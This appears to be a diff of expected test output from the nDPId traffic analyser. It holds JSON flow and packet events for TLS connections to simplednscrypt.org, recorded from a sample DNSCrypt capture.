-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286393,"flow_last_seen":1491813286393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286393,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1491813286393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286393,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSlAAIAGMLzAqCunhncaGMRTAbtepcAHAAAAAIACIADddQAAAgQFtAEDAwgBAQQC"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491813286463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286463,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xE3jDV\/XWG\/Y3IASchA2bgAAAgQFHgEBBAIBAwMH"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491813286463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286463,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSpAAIAGMMfAqCunhncaGMRNAbtYb9jc4w1f2FAQAEDoegAA"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286275,"flow_last_seen":1491813286464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286464,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1491813286470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286470,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADUGuOWGdxoYwKgrpwG7xFOF+CiKXqXACIASchDdaAAAAgQFHgEBBAIBAwMH"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1491813286470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286470,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSxAAIAGMMXAqCunhncaGMRTAbtepcAIhfgoi1AQAECPdQAA"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286393,"flow_last_seen":1491813286470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286470,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1491813286489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286489,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xFKVdKj9XuwOhIASchD+twAAAgQFHgEBBAIBAwMH"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1491813286489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286489,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPS5AAIAGMMPAqCunhncaGMRSAbte7A6ElXSo\/lAQAECwxAAA"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286392,"flow_last_seen":1491813286491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286491,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286393,"flow_last_seen":1491813286573,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286573,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286393,"flow_last_seen":1491813286577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286577,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286275,"flow_last_seen":1491813286586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286586,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286275,"flow_last_seen":1491813286594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286594,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":81,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286392,"flow_last_seen":1491813286609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286609,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":87,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286392,"flow_last_seen":1491813286612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286612,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1491813284555,"flow_last_seen":1491813285262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":14238,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286275,"flow_last_seen":1491813286718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286392,"flow_last_seen":1491813286753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1491813286393,"flow_last_seen":1491813286913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":9310,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813284555,"flow_last_seen":1491813284555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813284555,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491813284555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284555,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PRVAAIAGMNDAqCunhncaGMQ5Abvf\/XrjAAAAAIACIAChWwAAAgQFtAEDAwgBAQQC"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491813284666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284666,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xDnBW87r3\/165IASchC\/iQAAAgQFHgEBBAIBAwMH"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491813284666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813284666,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPRZAAIAGMNvAqCunhncaGMQ5Abvf\/XrkwVvO7FAQAEBxlgAA"} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813284555,"flow_last_seen":1491813284694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1491813284694,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813284555,"flow_last_seen":1491813284804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1516,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1491813284804,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1491813284555,"flow_last_seen":1491813284819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6756,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1491813284819,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286275,"flow_last_seen":1491813286275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286275,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491813286275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286275,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSdAAIAGML7AqCunhncaGMRNAbtYb9jbAAAAAIACIADK3QAAAgQFtAEDAwgBAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286392,"flow_last_seen":1491813286392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286392,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1491813286392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286392,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PShAAIAGML3AqCunhncaGMRSAbte7A6DAAAAAIACIACOtAAAAgQFtAEDAwgBAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286393,"flow_last_seen":1491813286393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286393,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1491813286393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286393,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSlAAIAGMLzAqCunhncaGMRTAbtepcAHAAAAAIACIADddQAAAgQFtAEDAwgBAQQC"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491813286463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286463,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xE3jDV\/XWG\/Y3IASchA2bgAAAgQFHgEBBAIBAwMH"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491813286463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286463,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSpAAIAGMMfAqCunhncaGMRNAbtYb9jc4w1f2FAQAEDoegAA"} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286275,"flow_last_seen":1491813286464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286464,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 